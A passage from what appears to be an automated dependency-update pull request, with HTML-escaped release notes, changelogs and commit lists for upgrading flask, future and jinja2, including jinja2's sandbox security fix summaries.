href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eChanges: \u003ca href=\"https://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\"\u003ehttps://flask.palletsprojects.com/en/2.1.x/changes/#version-2-1-2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMilestone: \u003ca href=\"https://github.com/pallets/flask/milestone/21?closed=1\"\u003ehttps://github.com/pallets/flask/milestone/21?closed=1\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.1.1\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the \u003ca href=\"https://github.com/pallets/flask/releases/tag/2.1.0\"\u003e2.1.0\u003c/a\u003e feature release.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/blob/main/CHANGES.rst\"\u003eflask's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.2.5\u003c/h2\u003e\n\u003cp\u003eReleased 2023-05-02\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.3.\u003c/li\u003e\n\u003cli\u003eSet \u003ccode\u003eVary: Cookie\u003c/code\u003e header when the session is accessed, modified, or refreshed.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.4\u003c/h2\u003e\n\u003cp\u003eReleased 2023-04-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate for compatibility with Werkzeug 2.3.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.3\u003c/h2\u003e\n\u003cp\u003eReleased 2023-02-15\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAutoescape is enabled by default for \u003ccode\u003e.svg\u003c/code\u003e template files. :issue:\u003ccode\u003e4831\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the type of \u003ccode\u003etemplate_folder\u003c/code\u003e to accept \u003ccode\u003epathlib.Path\u003c/code\u003e. :issue:\u003ccode\u003e4892\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e--debug\u003c/code\u003e option to the \u003ccode\u003eflask run\u003c/code\u003e command. :issue:\u003ccode\u003e4777\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.2\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-08\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Werkzeug dependency to \u0026gt;= 2.2.2. This includes fixes related\nto the new faster router, header parsing, and the development\nserver. :pr:\u003ccode\u003e4754\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix the default value for \u003ccode\u003eapp.env\u003c/code\u003e to be \u003ccode\u003e\u0026quot;production\u0026quot;\u003c/code\u003e. This\nattribute remains deprecated. :issue:\u003ccode\u003e4740\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.1\u003c/h2\u003e\n\u003cp\u003eReleased 2022-08-03\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSetting or accessing \u003ccode\u003ejson_encoder\u003c/code\u003e or \u003ccode\u003ejson_decoder\u003c/code\u003e raises a\ndeprecation warning. :issue:\u003ccode\u003e4732\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.2.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/47af817c8fe01045c641b97f8fb784c7ad864eee\"\u003e\u003ccode\u003e47af817\u003c/code\u003e\u003c/a\u003e release version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/afd63b16170b7c047f5758eb910c416511e9c965\"\u003e\u003ccode\u003eafd63b1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5109\"\u003e#5109\u003c/a\u003e from pallets/backport-vary-cookie\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/8646edca6f47e2cd57464081b3911218d4734f8d\"\u003e\u003ccode\u003e8646edc\u003c/code\u003e\u003c/a\u003e set \u003ccode\u003eVary: Cookie\u003c/code\u003e header consistently for session\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/a6367dac747c1e149c60767eee7e8aa9c281c58e\"\u003e\u003ccode\u003ea6367da\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5108\"\u003e#5108\u003c/a\u003e from pallets/werkzeug-compat\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/3fbfbad79fe294918459b70eb409d555b20de2c8\"\u003e\u003ccode\u003e3fbfbad\u003c/code\u003e\u003c/a\u003e werkzeug 2.3.3 compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/726d3f4fa9e8a2960541debc2d2713571da54441\"\u003e\u003ccode\u003e726d3f4\u003c/code\u003e\u003c/a\u003e start version 2.2.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/ddc7accaa2e83b328f969c120af2ce0804876b4a\"\u003e\u003ccode\u003eddc7acc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pallets/flask/issues/5081\"\u003e#5081\u003c/a\u003e from pallets/release-2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/74e03298200e33951ca350a35aa3a8c0b4ff8177\"\u003e\u003ccode\u003e74e0329\u003c/code\u003e\u003c/a\u003e release version 2.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/2d460685b1b3d66c713739ee91183c22fb2e5dc8\"\u003e\u003ccode\u003e2d46068\u003c/code\u003e\u003c/a\u003e update dev env\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/flask/commit/64bc45874daf4b9828830ea0037a19beb8364ee3\"\u003e\u003ccode\u003e64bc458\u003c/code\u003e\u003c/a\u003e update dev dependencies\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/flask/compare/1.0.2...2.2.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `future` from 0.16.0 to 1.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PythonCharmers/python-future/releases\"\u003efuture's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.0.0\u003c/h2\u003e\n\u003cp\u003eThe new version number of 1.0.0 indicates that the python-future project, like\nPython 2, is now done.\u003c/p\u003e\n\u003cp\u003eThe most important change in this release is adding support for Python 3.12\n(ba1cc50 and a6222d2 and bcced95).\u003c/p\u003e\n\u003cp\u003eThis release also includes these fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSmall updates to the docs\u003c/li\u003e\n\u003cli\u003eAdd SECURITY.md describing security policy (0598d1b)\u003c/li\u003e\n\u003cli\u003eFix pasteurize: NameError: name 'unicode' is not defined (de68c10)\u003c/li\u003e\n\u003cli\u003eMove CI to GitHub Actions (8cd11e8)\u003c/li\u003e\n\u003cli\u003eAdd setuptools to requirements for building docs (0c347ff)\u003c/li\u003e\n\u003cli\u003eFix typos in docs (350e87a)\u003c/li\u003e\n\u003cli\u003eMake the fix_unpacking fixer more robust (de68c10)\u003c/li\u003e\n\u003cli\u003eSmall improvements to shell scripts according to shellcheck (6153844)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.18.3\u003c/h2\u003e\n\u003cp\u003eThis is a minor bug-fix release containing a number of fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBackport fix for bpo-38804 (c91d70b)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_print.py fixer (dffc579)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_raise.py fixer (3401099)\u003c/li\u003e\n\u003cli\u003eFix newint bool in py3 (fe645ba)\u003c/li\u003e\n\u003cli\u003eFix bug in super() with metaclasses (6e27aac)\u003c/li\u003e\n\u003cli\u003edocs: fix simple typo, reqest -\u0026gt; request (974eb1f)\u003c/li\u003e\n\u003cli\u003eCorrect \u003cstrong\u003eeq\u003c/strong\u003e (c780bf5)\u003c/li\u003e\n\u003cli\u003ePass if lint fails (2abe00d)\u003c/li\u003e\n\u003cli\u003eUpdate docker image and parcel out to constant variable.  Add comment to update version constant (45cf382)\u003c/li\u003e\n\u003cli\u003efix order (f96a219)\u003c/li\u003e\n\u003cli\u003eAdd flake8 to image (046ff18)\u003c/li\u003e\n\u003cli\u003eMake lint.sh executable (58cc984)\u003c/li\u003e\n\u003cli\u003eAdd docker push to optimize CI (01e8440)\u003c/li\u003e\n\u003cli\u003eBuild System (42b3025)\u003c/li\u003e\n\u003cli\u003eAdd docs build status badge to README.md (3f40bd7)\u003c/li\u003e\n\u003cli\u003eUse same docs requirements in tox (18ecc5a)\u003c/li\u003e\n\u003cli\u003eAdd docs/requirements.txt (5f9893f)\u003c/li\u003e\n\u003cli\u003eAdd PY37_PLUS, PY38_PLUS, and PY39_PLUS (bee0247)\u003c/li\u003e\n\u003cli\u003efix 2.6 test, better comment (ddedcb9)\u003c/li\u003e\n\u003cli\u003efix 2.6 test (3f1ff7e)\u003c/li\u003e\n\u003cli\u003eremove nan test (4dbded1)\u003c/li\u003e\n\u003cli\u003einclude list test values (e3f1a12)\u003c/li\u003e\n\u003cli\u003efix other python2 test issues (c051026)\u003c/li\u003e\n\u003cli\u003efix missing subTest (f006cad)\u003c/li\u003e\n\u003cli\u003eimport from old imp library on older python versions (fc84fa8)\u003c/li\u003e\n\u003cli\u003ereplace fstrings with format for python 3.4,3.5 (4a687ea)\u003c/li\u003e\n\u003cli\u003eminor style/spelling fixes (8302d8c)\u003c/li\u003e\n\u003cli\u003eimprove cmp function, add unittest (0d95a40)\u003c/li\u003e\n\u003cli\u003ePin typing==3.7.4.1 for Python 3.3 compatiblity (1a48f1b)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/PythonCharmers/python-future/blob/master/docs/changelog.rst\"\u003efuture's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e.. _whats-old:\u003c/p\u003e\n\u003cp\u003eChanges in previous versions\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eChanges in the most recent major version are here: :ref:\u003ccode\u003ewhats-new\u003c/code\u003e.\u003c/p\u003e\n\u003ch1\u003eChanges in version 0.18.3 (2023-01-13)\u003c/h1\u003e\n\u003cp\u003eThis is a minor bug-fix release containing a number of fixes:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eBackport fix for bpo-38804 (c91d70b)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_print.py fixer (dffc579)\u003c/li\u003e\n\u003cli\u003eFix bug in fix_raise.py fixer (3401099)\u003c/li\u003e\n\u003cli\u003eFix newint bool in py3 (fe645ba)\u003c/li\u003e\n\u003cli\u003eFix bug in super() with metaclasses (6e27aac)\u003c/li\u003e\n\u003cli\u003edocs: fix simple typo, reqest -\u0026gt; request (974eb1f)\u003c/li\u003e\n\u003cli\u003eCorrect \u003cstrong\u003eeq\u003c/strong\u003e (c780bf5)\u003c/li\u003e\n\u003cli\u003ePass if lint fails (2abe00d)\u003c/li\u003e\n\u003cli\u003eUpdate docker image and parcel out to constant variable.  Add comment to update version constant (45cf382)\u003c/li\u003e\n\u003cli\u003efix order (f96a219)\u003c/li\u003e\n\u003cli\u003eAdd flake8 to image (046ff18)\u003c/li\u003e\n\u003cli\u003eMake lint.sh executable (58cc984)\u003c/li\u003e\n\u003cli\u003eAdd docker push to optimize CI (01e8440)\u003c/li\u003e\n\u003cli\u003eBuild System (42b3025)\u003c/li\u003e\n\u003cli\u003eAdd docs build status badge to README.md (3f40bd7)\u003c/li\u003e\n\u003cli\u003eUse same docs requirements in tox (18ecc5a)\u003c/li\u003e\n\u003cli\u003eAdd docs/requirements.txt (5f9893f)\u003c/li\u003e\n\u003cli\u003eAdd PY37_PLUS, PY38_PLUS, and PY39_PLUS (bee0247)\u003c/li\u003e\n\u003cli\u003efix 2.6 test, better comment (ddedcb9)\u003c/li\u003e\n\u003cli\u003efix 2.6 test (3f1ff7e)\u003c/li\u003e\n\u003cli\u003eremove nan test (4dbded1)\u003c/li\u003e\n\u003cli\u003einclude list test values (e3f1a12)\u003c/li\u003e\n\u003cli\u003efix other python2 test issues (c051026)\u003c/li\u003e\n\u003cli\u003efix missing subTest (f006cad)\u003c/li\u003e\n\u003cli\u003eimport from old imp library on older python versions (fc84fa8)\u003c/li\u003e\n\u003cli\u003ereplace fstrings with format for python 3.4,3.5 (4a687ea)\u003c/li\u003e\n\u003cli\u003eminor style/spelling fixes (8302d8c)\u003c/li\u003e\n\u003cli\u003eimprove cmp function, add unittest (0d95a40)\u003c/li\u003e\n\u003cli\u003ePin typing==3.7.4.1 for Python 3.3 compatiblity (1a48f1b)\u003c/li\u003e\n\u003cli\u003eFix various py26 unit test failures (9ca5a14)\u003c/li\u003e\n\u003cli\u003eAdd initial contributing guide with docs build instruction (e55f915)\u003c/li\u003e\n\u003cli\u003eAdd docs building to tox.ini (3ee9e7f)\u003c/li\u003e\n\u003cli\u003eSupport NumPy's specialized int types in builtins.round (b4b54f0)\u003c/li\u003e\n\u003cli\u003eAdded r\u0026quot;\u0026quot;\u0026quot; to the docstring to avoid warnings in python3 (5f94572)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003esubclasscheck\u003c/strong\u003e for past.types.basestring (c9bc0ff)\u003c/li\u003e\n\u003cli\u003eCorrect example in README (681e78c)\u003c/li\u003e\n\u003cli\u003eAdd simple documentation (6c6e3ae)\u003c/li\u003e\n\u003cli\u003eAdd pre-commit hooks (a9c6a37)\u003c/li\u003e\n\u003cli\u003eHandling of \u003cstrong\u003enext\u003c/strong\u003e and next by future.utils.get_next was reversed (52b0ff9)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/2bdbfa5664241fee622b23590abd3492f973afc9\"\u003e\u003ccode\u003e2bdbfa5\u003c/code\u003e\u003c/a\u003e Tidy up README\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/a7097f804cd83fe1fd6a50ab088ae1d4ab303246\"\u003e\u003ccode\u003ea7097f8\u003c/code\u003e\u003c/a\u003e Update docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/e32250e67423aaf4fbccd332be8a40fdcdba2711\"\u003e\u003ccode\u003ee32250e\u003c/code\u003e\u003c/a\u003e Update docs pointing to changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/dde60ad4c9857a11b9f54e8ae671aacde703e71a\"\u003e\u003ccode\u003edde60ad\u003c/code\u003e\u003c/a\u003e Move old \u0026quot;What's New\u0026quot; entries to the change log\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/b2ea4204fc269ede619526c7753c0fa6579d5d0d\"\u003e\u003ccode\u003eb2ea420\u003c/code\u003e\u003c/a\u003e Remove hacky logo from docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/a10a78bbd2921a4deaa423bdf5712acf9eb8d5a4\"\u003e\u003ccode\u003ea10a78b\u003c/code\u003e\u003c/a\u003e Update \u0026quot;What's New\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/9f8763032b4ac1dbe043db363feae26fe6d0bacc\"\u003e\u003ccode\u003e9f87630\u003c/code\u003e\u003c/a\u003e Update the FAQ entries on compatibility and contributing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/f4a1f0406b47e8ef91838fcff9d679ee6fe186d9\"\u003e\u003ccode\u003ef4a1f04\u003c/code\u003e\u003c/a\u003e Docs: replace http links with https\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/30c525e1aa6aa5a5a2b5d2ec4769feb00aa7a726\"\u003e\u003ccode\u003e30c525e\u003c/code\u003e\u003c/a\u003e Merge branch 'master' of \u003ca href=\"https://github.com/PythonCharmers/python-future\"\u003ehttps://github.com/PythonCharmers/python-future\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/PythonCharmers/python-future/commit/70b36a8a514e45a2582589991be4a2c1fd1944b7\"\u003e\u003ccode\u003e70b36a8\u003c/code\u003e\u003c/a\u003e Disable Python 2.6 CI tests for now\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/PythonCharmers/python-future/compare/v0.16.0...v1.0.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.10 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable 